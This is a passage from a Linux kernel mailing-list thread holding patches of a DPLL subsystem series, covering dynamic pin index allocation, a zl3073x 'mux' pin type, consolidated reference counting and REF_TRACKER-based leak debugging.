	pin = kzalloc(sizeof(*pin), GFP_KERNEL);
-	if (!pin)
-		return ERR_PTR(-ENOMEM);
+	if (!pin) {
+		ret = -ENOMEM;
+		goto err_pin_alloc;
+	}
	pin->pin_idx = pin_idx;
	pin->clock_id = clock_id;
	pin->module = module;
@@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module,
	dpll_pin_prop_free(&pin->prop);
 err_pin_prop:
	kfree(pin);
+err_pin_alloc:
+	dpll_pin_idx_free(pin_idx);
	return ERR_PTR(ret);
 }
 
@@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin *pin)
		xa_destroy(&pin->ref_sync_pins);
		dpll_pin_prop_free(&pin->prop);
		fwnode_handle_put(pin->fwnode);
+		dpll_pin_idx_free(pin->pin_idx);
		kfree_rcu(pin, rcu);
	}
	mutex_unlock(&dpll_lock);
diff --git a/include/linux/dpll.h b/include/linux/dpll.h
index 8ed90dfc65f05..8fff048131f1d 100644
--- a/include/linux/dpll.h
+++ b/include/linux/dpll.h
@@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type,
 void dpll_device_unregister(struct dpll_device *dpll,
			    const struct dpll_device_ops *ops, void *priv);
 
+#define DPLL_PIN_IDX_UNSPEC	U32_MAX
+
 struct dpll_pin *
 dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module,
	     const struct dpll_pin_properties *prop);
-- 
2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add parsing for the "mux" string in the 'connection-type' pin property mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support

Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in `dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, ensure that `dpll_device_{,un}register()` takes/releases a reference to the device, so that the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void
dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { 
mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, 
ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. 
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. 
+ source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + 
ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray 
*xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if 
all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. 
@@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. 
@@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c 
index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c 